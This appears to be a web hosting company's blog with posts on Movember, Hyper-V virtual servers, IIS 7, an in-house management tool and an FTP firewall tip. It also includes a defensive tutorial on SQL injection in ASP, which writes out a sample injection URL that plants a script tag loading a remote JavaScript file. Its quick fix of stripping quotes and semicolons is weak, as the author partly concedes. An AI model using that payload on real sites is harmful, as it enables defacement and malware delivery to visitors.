admin

Movember is here!

You know those normally hygienic people who for some strange reason decide to throw it out the window once a year and grow a hideous moustache?
Well believe it or not they haven't gone mad, they are supporting Movember which aims to raise funds and awareness for men's health.

This month my staff are on the ball, setting up a campaign where 5% of every Web Hosting or HyperVPS account purchased in the month of November will go straight to the Movember Foundation.
That money will then go on to either the Prostate Cancer Foundation of Australia or beyondblue: the national depression initiative. Two worthy causes I think you'll agree.

For full details you can visit our Movember website or head on over to the offical web site for all the details.

Battling SQL Injection

"SQL Injection" has become an increasingly common way for hackers to attack web sites, but what is SQL Injection and what can web developers do to avoid it?

SQL injection involves manipulating the variables sent to a web page in order to place additional SQL queries within queries used as part of the web site code.

There are a multitude of ways SQL Injection can be used for nefarious purposes but today we are going to look at the most common method at the moment being used to insert malicious javascript files into web sites

Take the following simple example using ASP:

testpage.asp 

<%

  szQuery = "Select * From myTable Where ID = " & Request("ID")

  

%>  

Because the Request("ID") variable isn't filtered or checked in any way, an attacker can manipulate the URL request string to insert any commands they like into the table.

So if they have a script at say http://testdomain.local/bad.js and the myTable has a column called "Description" which is used to display information on the page, an attacker could use the following:

 

"testpage.asp?ID=1;Update myTable set Description = '<script src="http://testdomain.local/bad.js"></script>' Where ID = 1"

This will update the record with ID = 1 to insert the javascript into the description field.

THIS IS BAD

So how does one fix it?

The best approach is to not use request variables directly in SQL in the first place, but in ASP this is not always an easy option.

In ASP.NET however, the problem can be solved by using the SQLCommand.Parameters to add each variable that is needed in the query.

Then the SQL Query will look something like this:

Select * From myTable Where ID = @ID;

But if you need to quickly fix older code in ASP, then filtering each request variable manually is a reasonable approach.
(Though not completely fool proof)

<%

  szID = Request("ID")
szID = Replace(szID,"'","")
szID = Replace(szID,";","")

szQuery = "Select * From myTable Where ID = '" & szID  & "'"

%> 

The above will "escape" potentially dangerous characters such as ' and ; from the variable completely.

Note that the above is only helpful if the ID variable is a string. 

If the variable is a known type other than a string (say Integer) then casting must be used to prevent nasty SQL from being inserted:

<%

  iID = CINT(Request("ID"))

szQuery = "Select * From myTable Where ID = " & iID 

  … 

%> 

In the above example, if an attacker tries to insert something into ID, it will cause an error and refuse to run the query.

So there you have it, SQL Injection is easy to avoid once you know how.

 

 

IIS 7 Web Hosting – now available

Just a quick post to say that IIS 7.0 is now available on all our Web Hosting plans.

Check out http://www.studiocoast.com.au/web-hosting.aspx for more information.

 

Blackbriar is here!

If you've wondered why there haven't been any posts to our blog in the last few weeks then wonder no more!

I have been busy at work on the latest version of our customer management system codenamed "blackbriar" (see our blog entry about "Alcatraz" for what the system is all about)

The two key features of this release are:

  • Windows Server 2008 / IIS7 support out-of-the-box. All existing control panel features now work with any Windows server in our fleet, regardless of whether it is 2003 or 2008.
  • Hyper-V support for managing our Virtual Private Servers product. Currently only our staff have access to the new features but we will be releasing a VPS Manager for the customer control panel soon.

We'll be releasing an IIS7 based Web Hosting service to the public soon, but in the mean time power users may be more interested in our new Hyper-V VPS service which comes with Windows Server 2008 and IIS7 as standard.

 

Meet “Alcatraz” – Our customer management system

Alcatraz Island: a prison surrounded by water.

On the surface i’ll admit it doesn’t sound like such a great name to call a customer management system.
We were thinking more along the lines of the security aspects the name implies rather than the concept of our staff feeling imprisoned while using it!

Alcatraz or simply “Management Client” is the system our staff use to manage customer accounts on a daily basis.
Take a look at the screenshot below: (click to view full size)

What will be immediately obvious to anyone who has worked in the web hosting industry before is that Alcatraz is an actual program and not a web site.
Most if not all off-the-shelf hosting management systems (such as Plesk etc) are web based and this can significantly increase the time it takes for a staff member to attend to a query.

Alcatraz on the other hand is super fast!

Features

Alcatraz was built from scratch to suit our unique way of doing things here at Studiocoast.
Some of the reasons why Alctraz is great:

  • Complete. A member of the Studiocoast support team only needs one program to manage every aspect of our web hosting services. From billing to hosting to payroll!
  • Fast. Setting up an account for a new customer for example takes less than 10 seconds. Best of all, only a single button needs to be pressed.
  • Powerful. Through the Storage tab our staff can access customer backups and restore them within seconds.
  • Extendable. New features can be added in record time thanks to a centralised system.
  • hostControl. Our web based control panel for customers links directly into the Alcatraz system. Restoring databases through the program is exactly the same as doing it through the control panel.
  • Did I mention it does everything?

Technical Details

If you’re a programmer you may be interested in how it all works behind the scenes:

  • Built on .NET 3.0.
  • Management Client and hostControl both connect to a central WCF (Windows Communication Foundation) server.
  • Server primarily utilises WMI (Windows Management Instrumentation) to communicate with all the servers in our fleet.
    (For tasks such as creating sites in IIS)

The Future

So what does the future hold for Alctraz?

At the moment I am hard at work on version 3.0 codenamed Blackbriar.
It will feature native support for IIS7 and MySQL 5.0 plus much much more.

Conclusion

I hope this post has been educational. If you have any questions about “Alcatraz” feel free to post in the comments below.
Perhaps you are a customer and would like to see some new features in hostControl. I’m all ears!

FTP 7 Passive Firewall Setup

Just a quick note on FTP 7, the new FTP server software for Windows Server 2008.

A guide I found on iis.net describes setting up passive port ranges and opening them up in the firewall one by one.

I have found an alternative method which I think is a lot easier to setup:

1. Open up Windows Firewall with Advanced Security from Administrative Tools
2. Right click Inbound Rules and select New Rule
3. Select the Custom Rule option and click next.
4. Select All Programs and then click Customize next to Services
5. Select Apply to this service and select from the list Microsoft FTP Service
6. For all the next steps simply click Next accepting the defaults.
7. For the name call it something like "Microsoft FTP Firewall Access"
8. Click Finish

Enjoy!

Note: this rule allows access to any ports the FTP Service opens. This is usually port 21, and any passive ports it opens for client connections.

Hyper-V is live!

Click here for our Windows Server 2008 VPS service utilising Hyper-V  starting from $80 per month

—-

June 26 will forever be remembered in history as the day Microsoft released Hyper-V to the server masses.
Ok, well maybe it isn't THAT memorable but it is still a pretty important piece of software in the Windows Hosting arena.

Why? Well i'm glad you asked…

Hyper-V is a hypervisor-based virtualisation platform that allows multiple concurrent operating systems to share a single host computer.

Now while Virtual Private Server technology has been around for many years now in many forms, Hyper-V, like any hypervisor based technology, brings additional benefits to the table:

  1. Performance

    Both Intel and AMD provide technology to allow Hypervisor-aware operating systems more direct access to the CPU.
    Previously,  VPS software has had to emulate the processor in order to convince the operating system it has a CPU all to itself.

  2. Isolation

    In an effort to get around the performance limitations in older technology, products such as Parallels Virtuozzo sub-divide
    a single operating system instance to give the appearance of multiple separate servers.

    This method of virtualisation has many limitations as it does not provide true isolation. A misbehaving program on one partition could potentially
    access the memory of another and cause corruption or worse.

    Hyper-V on the other hand will have none of those shenanigans. Each operating system instance is completely isolated and it is almost
    impossible for one to interfere with another.

  3. Administration

    Hyper-V comes with many administrative tools that make managing virtual servers a whole lot easier for system admins such as myself.
    We will be integrating many of these features into our hostControl control panel for end users to access.

  4. Friendly Product Licensing

    Friendly product licensing from Microsoft??? It's true, Hyper-V licensing for virtual servers is simple.
    One copy of the Windows Server 2008 Data Centre Edition license allows an unlimited amount of virtual servers on a single machine.

So what does this all mean for the end user then?

Purchasing a Hyper-V based virtual server from providers such as Studiocoast has the following benefits:

  1. A server to call your own

    Install whatever you want, whenever you want with full Administrative access.
    Reboot the server yourself into you're blue in the face if you want, it is all yours!

  2. Need more memory, disk space? No problem!

    Each virtual server can have memory or disk space upgraded at the click of a button.
    This allows you to purchase a server based on what you need now, all with a clear and easy upgrade path for the future.

  3. Economical

    A virtual server is much cheaper than a dedicated server and a whole lot more flexible to boot.

  4. More uptime, less downtime

    In the unlikely event of hardware failure, each virtual server can be quickly copied to a functioning server.
    Virtual servers all use the same drivers regardless of the underlying server so hardware compatibility is never a problem.

 So what are you waiting for? Check out our HyperVPS plans page.

 

Welcome!

It's been a long road to get here but the Studiocoast blog is finally online!

The Studiocoast team will be here to give you some insight into the workings of this humble Web Hosting provider.
We will also be offering some expert advice and tips shaped by the many challenges we have faced (and overcome) over the years.

Members of the team will each introduce themselves over the coming weeks as they find something to contribute!

I trust you will enjoy what we have to contribute to the blogosphere and hope you will find our posts useful.